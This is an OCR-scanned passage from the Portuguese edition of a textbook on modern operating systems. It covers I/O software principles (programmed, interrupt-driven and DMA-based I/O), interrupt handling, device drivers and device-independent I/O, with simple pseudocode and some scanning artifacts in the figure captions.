cadeia de caracteres ou um número inteiro e não depen- 
der do dispositivo de maneira alguma. No UNIX, todos 
os discos podem ser integrados na hierarquia do sistema 
de arquivos de maneiras arbitrárias, então o usuário não 
precisa estar ciente de qual nome corresponde a qual 
dispositivo. Por exemplo, um pen-drive pode ser mon- 
tado em cima do diretório /usr/ast/backup de maneira 
que, ao copiar um arquivo para /usr/ast/backup/Monday, 
você copia o arquivo para o pen-drive. Assim, todos os 
arquivos e dispositivos são endereçados da mesma ma- 
neira: por um nome de caminho. 

Outra questão importante para o software de E/S 
é o tratamento de erros. Em geral, erros devem ser 
tratados o mais próximo possível do hardware. Se o 
controlador descobre um erro de leitura, ele deve tentar 
corrigi-lo se puder. Se ele não puder, então o driver do 
dispositivo deverá lidar com ele, talvez simplesmente 
tentando ler o bloco novamente. Muitos erros são tran- 
sitórios, como erros de leitura causados por grãos de 
poeira no cabeçote de leitura, e muitas vezes desapare- 
cerão se a operação for repetida. Apenas se as camadas 
mais baixas não forem capazes de lidar com o problema 
as camadas superiores devem ser informadas a respeito. 
Em muitos casos, a recuperação de erros pode ser feita 
de modo transparente em um nível baixo sem que os 
níveis superiores sequer tomem conhecimento do erro. 

Ainda outra questão importante é a das transferências 
síncronas (bloqueantes) versus assíncronas (orientadas 
à interrupção). A maioria das E/S físicas são assincro- 
nas — a CPU inicializa a transferência e vai fazer outra 
coisa até a chegada da interrupção. Programas do usuá- 
rio são muito mais fáceis de escrever se as operações de 
E/S forem bloqueantes — após uma chamada de sistema 
read, o programa é automaticamente suspenso até que 
os dados estejam disponíveis no buffer. Fica a cargo do 
sistema operacional fazer operações que são realmente 
orientadas à interrupção parecerem bloqueantes para os 
programas do usuário. No entanto, algumas aplicações 
de muito alto desempenho precisam controlar todos os 
detalhes da E/S, então alguns sistemas operacionais dis- 
ponibilizam a E/S assíncrona para si. 

Outra questão para o software de E/S é a utilização 
de buffer. Muitas vezes, dados provenientes de um dis- 
positivo não podem ser armazenados diretamente em 
seu destino final. Por exemplo, quando um pacote chega 
da rede, o sistema operacional não sabe onde armazená- 
-lo definitivamente até que o tenha colocado em algum 
lugar para examiná-lo. Também, alguns dispositivos 
têm severas restrições de tempo real (por exemplo, dis- 
positivos de áudio digitais), portanto os dados devem 


244 | SISTEMAS OPERACIONAIS MODERNOS 


ser colocados antecipadamente em um buffer de saída 
para separar a taxa na qual o buffer é preenchido da taxa 
na qual ele é esvaziado, a fim de evitar seu completo 
esvaziamento. A utilização do buffer envolve considerá- 
veis operações de cópia e muitas vezes tem um impacto 
importante sobre o desempenho de E/S. 

O conceito final que mencionaremos aqui é o de 
dispositivos compartilhados versus dedicados. Alguns 
dispositivos de E/S, como discos, podem ser usados por 
muitos usuários ao mesmo tempo. Nenhum problema é 
causado por múltiplos usuários terem arquivos abertos 
no mesmo disco ao mesmo tempo. Outros dispositivos, 
como impressoras, têm de ser dedicados a um único 
usuário até ele ter concluído sua operação. Então outro 
usuário pode ter a impressora. Ter dois ou mais usuários 
escrevendo caracteres de maneira aleatória e intercala- 
da na mesma página definitivamente não funcionará. 
Introduzir dispositivos dedicados (não compartilhados) 
também introduz uma série de problemas, como os im- 
passes. Novamente, o sistema operacional deve ser capaz 
de lidar com ambos os dispositivos — compartilhados e 
dedicados — de uma maneira que evite problemas. 


5.2.2 E/S programada 


Há três maneiras fundamentalmente diferentes de rea- 
lizar E/S. Nesta seção examinaremos a primeira (E/S pro- 
gramada). Nas duas seções seguintes examinaremos as 
outras (E/S orientada à interrupções e E/S usando DMA). 
A forma mais simples de E/S é ter a CPU realizando todo 
o trabalho. Esse método é chamado de E/S programada. 

É mais simples ilustrar como a E/S programada fun- 
ciona mediante um exemplo. Considere um processo 
de usuário que quer imprimir a cadeia de oito carac- 
teres “ABCDEFGH” na impressora por meio de uma 
interface serial. Telas em pequenos sistemas embutidos 
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funcionam assim às vezes. O software primeiro monta a 
cadeia de caracteres em um buffer no espaço do usuário, 
como mostrado na Figura 5.7(a). 

O processo do usuário requisita então a impresso- 
ra para escrita fazendo uma chamada de sistema para 
abri-la. Se a impressora estiver atualmente em uso por 
outro processo, a chamada fracassará e retornará um 
código de erro ou bloqueará até que a impressora es- 
teja disponível, dependendo do sistema operacional e 
dos parâmetros da chamada. Uma vez que ele tenha a 
impressora, o processo do usuário faz uma chamada de 
sistema dizendo ao sistema operacional para imprimir a 
cadeia de caracteres na impressora. 

O sistema operacional então (normalmente) copia o 
buffer com a cadeia de caracteres para um vetor — di- 
gamos, p — no espaço do núcleo, onde ele é mais facil- 
mente acessado (pois o núcleo talvez tenha de mudar o 
mapa da memória para acessar o espaço do usuário). Ele 
então confere para ver se a impressora está disponível no 
momento. Se não estiver, ele espera até que ela esteja. 
Tão logo a impressora esteja disponível, o sistema ope- 
racional copia o primeiro caractere para o registrador de 
dados da impressora, nesse exemplo usando a E/S mape- 
ada na memória. Essa ação ativa a impressora. O caracte- 
re pode não aparecer ainda porque algumas impressoras 
armazenam uma linha ou uma página antes de imprimir 
qualquer coisa. Na Figura 5.7(b), no entanto, vemos que 
o primeiro caractere foi impresso e que o sistema marcou 
o “B” como o próximo caractere a ser impresso. 

Tão logo copiado o primeiro caractere para a impres- 
sora, O sistema operacional verifica se ela está pronta 
para aceitar outro. Geralmente, a impressora tem um 
segundo registrador, que contém seu estado. O ato de 
escrever para o registrador de dados faz que o estado 
torne-se “indisponível”. Quando o controlador da im- 
pressora tiver processado o caractere atual, ele indica a 


Página 
impressa 


Próximo 





sua disponibilidade marcando algum bit em seu regis- 
trador de status ou colocando algum valor nele. 

Nesse ponto, o sistema operacional espera que a im- 
pressora fique pronta de novo. Quando isso acontece, 
ele imprime o caractere seguinte, como mostrado na 
Figura 5.7(c). Esse laço continua até que a cadeia intei- 
ra tenha sido impressa. Então o controle retorna para o 
processo do usuário. 

As ações seguidas pelo sistema operacional estão 
brevemente resumidas na Figura 5.8. Primeiro os dados 
são copiados para o núcleo. Então o sistema operacional 
entra em um laço fechado, enviando um caractere de 
cada vez para a saída. O aspecto essencial da E/S pro- 
gramada, claramente ilustrado nessa figura, é que, após 
a saída de um caractere, a CPU continuamente verifi- 
ca o dispositivo para ver se ele está pronto para aceitar 
outro. Esse comportamento é muitas vezes chamado de 
espera ocupada (busy waiting) ou polling. 

A E/S programada é simples, mas tem a desvanta- 
gem de segurar a CPU o tempo todo até que toda a E/S 
tenha sido feita. Se o tempo para “imprimir” um carac- 
tere for muito curto (pois tudo o que a impressora está 
fazendo é copiar o novo caractere para um buffer in- 
terno), então a espera ocupada estará bem. No entanto, 
em sistemas mais complexos, em que a CPU tem outros 
trabalhos a fazer, a espera ocupada será ineficiente, e 
será necessário um método de E/S melhor. 


5.2.3 E/S orientada a interrupções 


Agora vamos considerar o caso da impressão em uma 
impressora que não armazena caracteres, mas imprime cada 
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um à medida que ele chega. Se a impressora puder imprimir, 
digamos, 100 caracteres/segundo, cada caractere levará 
10 ms para imprimir. Isso significa que após cada caractere 
ter sido escrito no registrador de dados da impressora, a CPU 
vai permanecer em um laço ocioso por 10 ms esperando a 
permissão para a saída do próximo caractere. Isso é mais 
tempo do que o necessário para realizar um chaveamen- 
to de contexto e executar algum outro processo durante os 
10 ms que de outra maneira seriam desperdiçados. 

A maneira de permitir que a CPU faça outra coisa 
enquanto espera que a impressora fique pronta é usar 
interrupções. Quando a chamada de sistema para im- 
primir a cadeia é feita, o buffer é copiado para o espaço 
do núcleo, como já mostramos, e o primeiro caractere é 
copiado para a impressora tão logo ela esteja disposta a 
aceitar um caractere. Nesse ponto, a CPU chama o esca- 
lonador e algum outro processo é executado. O processo 
que solicitou que a cadeia seja impressa é bloqueado até 
que a cadeia inteira seja impressa. O trabalho feito du- 
rante a chamada de sistema é mostrado na Figura 5.9(a). 

Quando a impressora imprimiu o caractere e está 
preparada para aceitar o próximo, ela gera uma inter- 
rupção. Essa interrupção para o processo atual e salva 
seu estado. Então a rotina de tratamento de interrupção 
da impressora é executada. Uma versão simples desse 
código é mostrada na Figura 5.9(b). Se não houver mais 
caracteres a serem impressos, o tratador de interrupção 
excuta alguma ação para desbloquear o usuário. Caso 
contrário, ele sai com o caractere seguinte, reconhece 
a interrupção e retorna ao processo que estava sendo 
executado um momento antes da interrupção, o qual 
continua a partir do ponto em que ele parou. 


(eU TEE: Escrevendo uma cadeia de caracteres para a impressora usando E/S programada. 


copy from user(buffer, p, cont); 

for (i=0; i < count; i++) { 
while (*printer_status_reg I=READY) ; 
*printer_data_register = p[i]; 

} 


return_to_user(); 


/* p e o buffer do nucleo */ 

/* executa o laco para cada caractere */ 

/* executa o laco ate a impressora estar pronta*/ 
/* envia um caractere para a saida */ 


le] TVR] Escrevendo uma cadeia de caracteres na impressora usando E/S orientada à interrupção. (a) Código executado no 
momento em que a chamada de sistema para execução é feita. (b) Rotina de tratamento da execução para a impressora. 


copy. from user(buffer, p, count); 
enable interrupts(); 


while (*printer status reg = READY) ; 


*printer data register = p[0]; 
scheduler(); 


if (count == 0) { 
unblock user(); 
} else { 
*printer data register = p[i]; 
count = count — 1; 
i=i+1; 


acknowledge interrupt(); 
return. from interrupt(); 


(b) 
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5.2.4 E/S usando DMA 


Uma desvantagem óbvia do mecanismo de E/S orien- 
tado a interrupções é que uma interrupção ocorre em cada 
caractere. Interrupções levam tempo; portanto, esse esque- 
ma desperdiça certa quantidade de tempo da CPU. Uma 
solução é usar o acesso direto à memória (DMA). Aqui a 
ideia é deixar que o controlador de DMA alimente os ca- 
racteres para a impressora um de cada vez, sem que a CPU 
seja incomodada. Na essência, o DMA executa E/S pro- 
gramada, apenas com o controlador do DMA realizando 
todo o trabalho, em vez da CPU principal. Essa estratégia 
exige um hardware especial (o controlador de DMA), mas 
libera a CPU durante a E/S para fazer outros trabalhos. 
Uma linha geral do código é dada na Figura 5.10. 

A grande vantagem do DMA é reduzir o número de 
interrupções de uma por caractere para uma por buffer 
impresso. Se houver muitos caracteres e as interrupções 
forem lentas, esse sistema poderá representar uma melho- 
ria importante. Por outro lado, o controlador de DMA nor- 
malmente é muito mais lento do que a CPU principal. Se 
o controlador de DMA não é capaz de dirigir o dispositivo 
em velocidade máxima, ou a CPU normalmente não tem 
nada para fazer de qualquer forma enquanto esperando 
pela interrupção do DMA, então a E/S orientada à inter- 
rupção ou mesmo a E/S programada podem ser melhores. 
Na maioria das vezes, no entanto, o DMA vale a pena. 


5.3 Camadas do software de E/S 


O software de E/S costuma ser organizado em quatro 
camadas, como mostrado na Figura 5.11. Cada camada 


Impressão de uma cadeia de caracteres usando 
o DMA. (a) Código executado quando a chamada 
de sistema print é feita. (b) Rotina de tratamento 
da interrupção. 

copy from user(buffer, p, count); 


set up DMA controller(); 
scheduler(); 


acknowledge interrupt(); 
unblock user(); 
return. from. interrupt(); 


(a) (b) 


|FIGURA 5.11 | Camadas do sistema de software de E/S. 


tem uma função bem definida a desempenhar e uma 
interface bem definida para as camadas adjacentes. A 
funcionalidade e as interfaces diferem de sistema para 
sistema; portanto, a discussão que se segue, que exami- 
na todas as camadas começando de baixo, não é especi- 
fica para uma máquina. 


5.3.1 Tratadores de interrupção 


Embora a E/S programada seja útil ocasionalmente, 
para a maioria das E/S, as interrupções são um fato de- 
sagradável da vida e não podem ser evitadas. Elas de- 
vem ser escondidas longe, nas profundezas do sistema 
operacional, de maneira que a menor parcela possível 
do sistema operacional saiba delas. A melhor maneira 
de escondê-las é bloquear o driver que inicializou uma 
operação de E/S até que ela se complete e a interrupção 
ocorra. O driver pode bloquear a si mesmo, por exem- 
plo, realizando um down em um semáforo, um wait em 
uma variável de condição, um receive em uma mensa- 
gem, ou algo similar. 

Quando a interrupção acontece, a rotina de interrup- 
ção faz o que for necessário a fim de lidar com ela. Então 
ela pode desbloquear o driver que a chamou. Em alguns 
casos, apenas completará a operação up em um semáforo. 
Em outras, ela emitirá um signal sobre uma variável de 
condição em um monitor. Em outras ainda, enviará uma 
mensagem para o driver bloqueado. Em todos os casos, o 
efeito resultante da interrupção será de que um driver que 
estava anteriormente bloqueado estará agora disponível 
para executar. Esse modelo funciona melhor se os drivers 
estiverem estruturados como processos do núcleo, com 
seus próprios estados, pilhas e contadores de programa. 

É claro que a realidade não é tão simples. Processar 
uma interrupção não é apenas uma questão de intercep- 
tar a interrupção, realizar um up em algum semáforo 
e então executar uma instrução IRET para retornar da 
interrupção para o processo anterior. Há bem mais tra- 
balho envolvido para o sistema operacional. Faremos 
agora um resumo desse trabalho como uma série de 
passos que devem ser realizados no software após a 
interrupção de hardware ter sido completada. Deve ser 
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observado que os detalhes são altamente dependentes 
no sistema, de maneira que alguns dos passos listados a 
seguir podem não ser necessários em uma máquina em 
particular, e passos não listados podem ser necessários. 
Além disso, os passos que ocorrem podem acontecer 
em uma ordem diferente em algumas máquinas. 


1. Salvar quaisquer registros (incluindo o PSW) 
que ainda não foram salvos pelo hardware de 
interrupção. 

2. Estabelecer um contexto para a rotina de trata- 
mento da interrupção. Isso pode envolver a confi- 
guração de TLB, MMU e uma tabela de páginas. 

3. Estabelecer uma pilha para a rotina de tratamento 
da interrupção. 

4. Sinalizar o controlador de interrupções. Se 
não houver um controlador delas centralizado, 
reabilitá-las. 

5. Copiar os registradores de onde eles foram sal- 
vos (possivelmente alguma pilha) para a tabela 
de processos. 

6. Executar a rotina de tratamento de interrupção. 
Ela extrairá informações dos registradores do con- 
trolador do dispositivo que está interrompendo. 

7. Escolher qual processo executar em seguida. Se a 
interrupção deixou pronto algum processo de alta 
prioridade que estava bloqueado, ele pode ser es- 
colhido para executar agora. 

8. Escolher o contexto de MMU para o próximo 
processo a executar. Algum ajuste na TBL tam- 
bém pode ser necessário. 

9. Carregar os registradores do novo processo, in- 
cluindo sua PSW. 

10.Começar a execução do novo processo. 


Como podemos ver, o processamento da interrupção 
está longe de ser trivial. Ele também exige um número 
considerável de instruções da CPU, especialmente em 
máquinas nas quais a memória virtual está presente e as 
tabelas de páginas precisam ser atualizadas ou o esta- 
do da MMU armazenado (por exemplo, os bits R e M). 
Em algumas máquinas, a TLB e a cache da CPU talvez 
também tenham de ser gerenciadas quando trocam entre 
modos núcleo e usuário, que usam ciclos de máquina 
adicionais. 


5.3.2 Drivers dos dispositivos 


No início deste capítulo, examinamos o que fazem 
os controladores dos dispositivos. Vimos que cada con- 
trolador tem alguns registradores do dispositivo usa- 
dos para dar a ele comandos ou para ler seu estado ou 
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ambos. O número de registradores do dispositivo e a 
natureza dos comandos variam radicalmente de disposi- 
tivo para dispositivo. Por exemplo, um driver de mouse 
tem de aceitar informações do mouse dizendo a ele o 
quanto ele se moveu e quais botões estão pressionados 
no momento. Em contrapartida, um driver de disco tal- 
vez tenha de saber tudo sobre setores, trilhas, cilindros, 
cabeçotes, movimento do braço, unidades do motor, 
tempos de ajuste do cabeçote e todas as outras mecâni- 
cas que fazem um disco funcionar adequadamente. Ob- 
viamente, esses drivers serão muito diferentes. 

Em consequência, cada dispositivo de E/S ligado 
a um computador precisa de algum código específico 
do dispositivo para controlá-lo. Esse código, chamado 
driver do dispositivo, geralmente é escrito pelo fabri- 
cante do dispositivo e fornecido junto com ele. Tendo 
em vista que cada sistema operacional precisa dos seus 
próprios drivers, os fabricantes de dispositivos comu- 
mente fornecem drivers para vários sistemas operacio- 
nais populares. 

Cada driver de dispositivo normalmente lida com 
um tipo, ou no máximo, uma classe de dispositivos 
muito relacionados. Por exemplo, um driver de dis- 
co SCSI em geral pode lidar com múltiplos discos 
SCSI de tamanhos e velocidades diferentes, e talvez 
um disco Blu-ray SCSI também. Por outro lado, um 
mouse e um joystick diferem tanto que drivers dife- 
rentes são normalmente necessários. No entanto, não 
há nenhuma restrição técnica sobre ter um driver do 
dispositivo controlando múltiplos dispositivos não 
relacionados. Apenas não é uma boa ideia na maioria 
dos casos. 

Às vezes, no entanto, dispositivos completamente di- 
ferentes são baseados na mesma tecnologia subjacente. 
O exemplo mais conhecido é provavelmente o USB, uma 
tecnologia de barramento serial que não é chamada de 
“universal” por acaso. Dispositivos USB incluem discos, 
pen-drives, câmeras, mouses, teclados, miniventilado- 
res, cartões de rede wireless, robôs, leitores de cartão de 
crédito, barbeadores recarregáveis, picotadores de pa- 
pel, scanners de códigos de barras, bolas de espelhos e 
termômetros portáteis. Todos usam USB e, no entanto, 
todos realizam coisas muito diferentes. O truque é que 
drivers de USB são tipicamente empilhados, como uma 
pilha de TCP/IP em redes. Na parte de baixo, em geral no 
hardware, encontramos a camada do link do USB (E/S 
serial) que lida com questões de hardware como sinaliza- 
ção e decodificação de um fluxo de sinais para os pacotes 
do USB. Ele é usado por camadas mais altas que lidam 
com pacotes de dados e a funcionalidade comum para 
USB que é compartilhada pela maioria dos dispositivos. 
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Em cima disso, por fim, encontramos as APIs de cama- 
das superiores, como as interfaces para armazenamento 
em massa, câmeras etc. Desse modo, ainda temos drivers 
de dispositivos em separado, embora eles compartilhem 
de parte da pilha de protocolo. 

Para acessar o hardware do dispositivo, isto é, os re- 
gistradores do controlador, o driver do dispositivo deve 
fazer parte do núcleo do sistema operacional, pelo me- 
nos com as arquiteturas atuais. Na realidade, é possível 
construir drivers que são executados no espaço do usu- 
ário, com chamadas de sistema para leitura e escrita nos 
registradores do dispositivo. Esse projeto isola o núcleo 
dos drivers e os drivers entre si, eliminando uma fonte 
importante de quedas no sistema — drivers defeituosos 
que interferem com o núcleo de uma maneira ou ou- 
tra. Para construir sistemas altamente confiáveis, este 
é definitivamente o caminho a seguir. Um exemplo de 
um sistema no qual os drivers do dispositivo executam 
como processos do usuário é o MINIX 3 (<www.minix3. 
org>). No entanto, como a maioria dos sistemas opera- 
cionais de computadores de mesa espera que os drivers 
executem no núcleo, este será um modelo que conside- 
raremos aqui. 


Tendo em vista que os projetistas de cada sistema 
operacional sabem que pedaços de código (drivers) es- 
critos por terceiros serão instalados no sistema opera- 
cional, este precisa ter uma arquitetura que permita essa 
instalação. Isso significa ter um modelo bem definido 
do que faz um driver e como ele interage com o res- 
to do sistema operacional. Drivers de dispositivos são 
normalmente posicionados abaixo do resto do sistema 
operacional, como está ilustrado na Figura 5.12. 

Sistemas operacionais normalmente classificam os 
drivers entre um número pequeno de categorias. As ca- 
tegorias mais comuns são os dispositivos de blocos — 
como discos, que contêm múltiplos blocos de dados que 
podem ser endereçados independentemente — e dispo- 
sitivos de caracteres, como teclados e impressoras, que 
geram ou aceitam um fluxo de caracteres. 

A maioria dos sistemas operacionais define uma in- 
terface padrão a que todos os drivers de blocos devem 
dar suporte e uma segunda interface padrão a que todos 
os drivers de caracteres devem dar suporte. Essas inter- 
faces consistem em uma série de rotinas que o resto do 
sistema operacional pode utilizar para fazer o driver tra- 
balhar para ele. Procedimentos típicos são aqueles que 


le) YA Posicionamento lógico dos drivers de dispositivos. Na realidade, toda comunicação entre os drivers e os controladores dos 
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leem um bloco (dispositivo de blocos) ou escrevem uma 
cadeia de caracteres (dispositivo de caracteres). 

Em alguns sistemas, o sistema operacional é um pro- 
grama binário único que contém compilado em si todos 
os drivers de que ele precisará. Esse esquema era a nor- 
ma por anos com sistemas UNIX, pois eles eram exe- 
cutados por centros computacionais e os dispositivos de 
E/S raramente mudavam. Se um novo dispositivo era 
acrescentado, o administrador do sistema simplesmente 
recompilava o núcleo com o driver novo para construir 
o binário novo. 

Com o advento dos computadores pessoais, com sua 
miríade de dispositivos de F/S, esse modelo não funcio- 
nava mais. Poucos usuários são capazes de recompilar 
ou religar o núcleo, mesmo que eles tenham o código- 
-fonte ou módulos-objeto, o que nem sempre é o caso. 
Em vez disso, sistemas operacionais, começando com 
o MS-DOS, se converteram em um modelo no qual os 
drivers eram dinamicamente carregados no sistema du- 
rante a execução. Sistemas diferentes lidam com o car- 
regamento de drivers de maneiras diferentes. 

Um driver de dispositivo apresenta diversas funções. 
A mais óbvia é aceitar solicitações abstratas de leitura 
e escrita de um software independente de dispositivo 
localizado na camada acima dele e verificar que elas 
sejam executadas. Mas há também algumas outras fun- 
ções que ele deve realizar. Por exemplo, o driver deve 
inicializar o dispositivo, se necessário. Ele também 
pode precisar gerenciar suas necessidades de energia e 
registrar seus eventos. 

Muitos drivers de dispositivos têm uma estrutura ge- 
ral similar. Um driver típico inicia verificando os para- 
metros de entrada para ver se eles são válidos. Se não, 
um erro é retornado. Se eles forem válidos, uma tradu- 
ção dos termos abstratos para os termos concretos pode 
ser necessária. Para um driver de disco, isso pode signi- 
ficar converter um número de bloco linear em números 
de cabeçote, trilha, setor e cilindro para a geometria 
do disco. 

Em seguida, o driver pode conferir se o dispositivo 
está em uso no momento. Se ele estiver, a solicitação 
entrará em uma fila para processamento posterior. Se 
o dispositivo estiver ocioso, o estado do hardware será 
examinado para ver se a solicitação pode ser cuidada 
agora. Talvez seja necessário ligar o dispositivo ou um 
motor antes que as transferências possam começar. 
Uma vez que o dispositivo esteja ligado e pronto para 
trabalhar, o controle de verdade pode começar. 

Controlar o dispositivo significa emitir uma sequên- 
cia de comandos para ele. O driver é o local onde a se- 
quência de comandos é determinada, dependendo do 
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que precisa ser feito. Após o driver saber qual comando 
ele vai emitir, ele começa escrevendo-os nos registrado- 
res do controlador do dispositivo. Após cada comando 
ter sido escrito para o controlador, talvez seja necessário 
conferir para ver se este aceitou o comando e está pre- 
parado para aceitar o seguinte. Essa sequência continua 
até que todos os comandos tenham sido emitidos. Al- 
guns controladores podem receber uma lista encadeada 
de comandos (na memória), tendo de ler e processar to- 
dos eles sem mais ajuda alguma do sistema operacional. 

Após os comandos terem sido emitidos, ocorrerá 
uma de duas situações. Na maioria dos casos, o driver 
do dispositivo deve esperar até que o controlador realize 
algum trabalho por ele, de maneira que ele bloqueia a si 
mesmo até que a interrupção chegue para desbloqueá- 
-lo. Em outros casos, no entanto, a operação termina 
sem atraso, então o driver não precisa bloquear. Como 
um exemplo da segunda situação, a rolagem da tela 
exige apenas escrever alguns bytes nos registradores 
do controlador. Nenhum movimento mecânico é neces- 
sário; assim, toda a operação pode ser completada em 
nanossegundos. 

No primeiro caso, o driver bloqueado será despertado 
pela interrupção. No segundo caso, ele jamais dormirá. 
De qualquer maneira, após a operação ter sido comple- 
tada, o driver deverá conferir a ocorrência de erros. Se 
tudo estiver bem, o driver poderá ter alguns dados para 
passar para o software independente do dispositivo (por 
exemplo, um bloco recém-lido). Por fim, ele retorna ao 
seu chamador alguma informação de estado para o re- 
latório de erros. Se quaisquer outras solicitações estive- 
rem na fila, uma delas poderá então ser selecionada e 
inicializada. Se nada estiver na fila, o driver bloqueará a 
espera para a próxima solicitação. 

Esse modelo simples é apenas uma aproximação da 
realidade. Muitos fatores tornam o código muito mais 
complicado. Por um lado, um dispositivo de E/S pode 
completar uma tarefa enquanto um driver está sendo 
executado, interrompendo o driver. A interrupção pode 
colocar um driver em execução. Na realidade, ela pode 
fazer que o driver atual execute. Por exemplo, enquanto 
o driver da rede está processando um pacote que chega, 
outro pacote pode chegar. Em consequência, os drivers 
têm de ser reentrantes, significando que um driver em 
execução tem de estar preparado para ser chamado uma 
segunda vez antes que a primeira chamada tenha sido 
concluída. 

Em um sistema manuseavel em operação (hot-plug- 
gable system), dispositivos podem ser adicionados ou 
removidos enquanto o computador está executando. 
Como resultado, enquanto um driver está ocupado 
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lendo de algum dispositivo, o sistema pode informá-lo 
de que o usuário removeu subitamente aquele disposi- 
tivo do sistema. Não apenas a transferência de E/S atu- 
al deve ser abortada sem danificar nenhuma estrutura 
de dados do núcleo, como quaisquer solicitações pen- 
dentes para o agora desaparecido dispositivo também 
devem ser cuidadosamente removidas do sistema e a 
má notícia ser dada aos processos que as requisitaram. 
Além disso, a adição inesperada de novos dispositi- 
vos pode levar o núcleo a fazer malabarismos com os 
recursos (por exemplo, linhas de solicitação de inter- 
rupção), tirando os mais antigos do driver e colocando 
novos em seu lugar. 

Drivers não têm permissão para fazer chamadas de 
sistema, mas eles muitas vezes precisam interagir com 
o resto do núcleo. Em geral, são permitidas chamadas 
para determinadas rotinas de núcleo. Por exemplo, 
normalmente há chamadas para alocar e liberar pági- 
nas físicas de memória para usar como buffers. Outras 
chamadas úteis são necessárias para o gerenciamento da 
MMU, dos relógios, do controlador de DMA, do con- 
trolador de interrupção e assim por diante. 


5.3.3 Software de E/S independente de dispositivo 


Embora parte do software de E/S seja específico 
do dispositivo, outras partes dele são independentes. 
O limite exato entre os drivers e o software indepen- 
dente do dispositivo é dependente do sistema (e dispo- 
sitivo), pois algumas funções que poderiam ser feitas 
de maneira independente do dispositivo podem na rea- 
lidade ser feitas nos drivers, em busca de eficiência 
ou outras razões. As funções mostradas na Figura 5.13 
são tipicamente realizadas em softwares independen- 
tes do dispositivo. 

A função básica do software independente do dis- 
positivo é realizar as funções de E/S que são comuns a 
todos os dispositivos e fornecer uma interface uniforme 
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Reportar erros 





Alocar e liberar dispositivos dedicados 





Providenciar um tamanho de bloco independente de dispositivo 








para o software no nível do usuário. Examinaremos 
agora essas questões mais detalhadamente. 


Interface uniforme para os drivers dos dispositivos 


Uma questão importante em um sistema operacional 
é como fazer todos os dispositivos de E/S e drivers pare- 
cerem mais ou menos o mesmo. Se discos, impressoras, 
teclados e assim por diante possuem todos interfaces 
diferentes, sempre que um dispositivo novo aparece, o 
sistema operacional tem de ser modificado para o novo 
dispositivo. Ter de modificar o sistema operacional para 
cada dispositivo novo não é uma boa ideia. 

Um aspecto dessa questão é a interface entre os 
drivers do dispositivo e o resto do sistema operacio- 
nal. Na Figura 5.14(a), ilustramos uma situação na 
qual cada driver do dispositivo tem uma interface 
diferente para o sistema operacional. O que isso sig- 
nifica é que as funções do driver disponíveis para o 
sistema chamar diferem de driver para driver. Tam- 
bém pode significar que as funções do núcleo de que 
o driver precisa também diferem de driver para dri- 
ver. Como um todo, isso significa que fornecer uma 
interface para cada novo driver exige um novo esfor- 
ço considerável de programação. 

Em comparação, na Figura 5.14(b), mostramos um 
projeto diferente no qual todos os drivers têm a mesma 
interface. Nesse caso fica muito mais fácil acoplar um 
driver novo, desde que ele esteja em conformidade com 
a interface do driver. Também significa que os escrito- 
res de drivers sabem o que é esperado deles. Na prática, 
nem todos os dispositivos são absolutamente idênticos, 
mas costuma existir apenas um pequeno número de ti- 
pos de dispositivos e mesmo esses são geralmente quase 
os mesmos. 

A maneira como isso funciona é a seguinte: para cada 
classe de dispositivos, como discos ou impressoras, o sis- 
tema operacional define um conjunto de funções que o 
driver deve fornecer. Para um disco, essas naturalmente 
incluiriam a leitura e a escrita, além de ligar e desligar a 
energia, formatação e outras coisas típicas de discos. Mui- 
tas vezes o driver contém uma tabela com ponteiros para si 
mesmo para essas funções. Quando o driver está carrega- 
do, o sistema operacional registra o endereço dessa tabela 
de ponteiros de funções, de maneira que, quando ela preci- 
sa chamar uma das funções, pode fazer uma chamada indi- 
reta via essa tabela. A tabela de ponteiros de funções define 
a interface entre o driver e o resto do sistema operacional. 
Todos os dispositivos de uma determinada classe (discos, 
impressoras etc.) devem obedecer a ela. 
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(FIGURA 5.14 | (a) Sem uma interface-padrão para o driver. (b) Com uma interface-padrão para o driver. 
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Outro aspecto que surge quando se tem uma interfa- 
ce uniforme é como os dispositivos de E/S são nomeados. 
O software independente do dispositivo cuida do mapea- 
mento de nomes de dispositivos simbólicos para o driver 
apropriado. No UNIX, por exemplo, o nome de um dis- 
positivo como /dev/disk0 especifica unicamente o i-node 
para um arquivo especial, e esse i-node contém o número 
do dispositivo especial, que é usado para localizar o driver 
apropriado. O i-node também contém o número do dispo- 
sitivo secundário, que é passado como um parâmetro para 
o driver a fim de especificar a unidade a ser lida ou escrita. 
Todos os dispositivos têm números principal e secundário, 
e todos os drivers são acessados usando o número de dis- 
positivo especial para selecionar o driver. 

Estreitamente relacionada com a nomeação está a 
proteção. Como o sistema evita que os usuários aces- 
sem dispositivos aos quais eles não estão autorizados 
a acessar? Tanto no UNIX quanto no Windows os 
dispositivos aparecem no sistema de arquivos como 
objetos nomeados, o que significa que as regras de 
proteção usuais para os arquivos também se aplicam a 
dispositivos de E/S. O administrador do sistema pode 
então estabelecer as permissões adequadas para cada 
dispositivo. 


Utilização de buffer 


A utilização de buffer também é uma questão, tan- 
to para dispositivos de bloco quanto de caracteres, por 
uma série de razões. Para ver uma delas, considere um 
processo que quer ler dados de um modem (ADSL — 
Asymmetric Digital Subscriber Line — linha de as- 
sinante digital assimétrica), algo que muitas pessoas 
usam em casa para conectar-se à internet. Uma estra- 
tégia possível para lidar com os caracteres que chegam 
é fazer o processo do usuário realizar uma chamada de 
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Driver do Driver da Driver do 
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sistema read e bloquear a espera por um caractere. Cada 
caractere que chega causa uma interrupção. A rotina de 
tratamento da interrupção passa o caractere para o pro- 
cesso do usuário e o desbloqueia. Após colocar o ca- 
ractere em algum lugar, o processo lê outro caractere 
e bloqueia novamente. Esse modelo está indicado na 
Figura 5.15(a). 

O problema com essa maneira de fazer negócios é que 
o processo do usuário precisa ser inicializado para cada 
caractere que chega. Permitir que um processo execute 
muitas vezes durante curtos intervalos de tempo é algo 
ineficiente; portanto, esse projeto não é uma boa opção. 

Uma melhoria é mostrada na Figura 5.15(b). Aqui o 
processo do usuário fornece um buffer de n caracteres 
no espaço do usuário e faz uma leitura de n caracteres. A 
rotina de tratamento da interrupção coloca os caracteres 
que chegam nesse buffer até que ele esteja completa- 
mente cheio. Apenas então ele desperta o processo do 
usuário. Esse esquema é muito mais eficiente do que o 
anterior, mas tem uma desvantagem: o que acontece se 
o buffer for paginado para o disco quando um caractere 
chegar? O buffer poderia ser trancado na memória, mas 
se muitos processos começarem a trancar páginas na 
memória descuidadamente, o conjunto de páginas dis- 
poníveis diminuirá e o desempenho cairá. 

Outra abordagem ainda é criar um buffer dentro do 
núcleo e fazer o tratador de interrupção colocar os ca- 
racteres ali, como mostrado na Figura 5.15(c). Quando 
esse buffer estiver cheio, a página com o buffer do usu- 
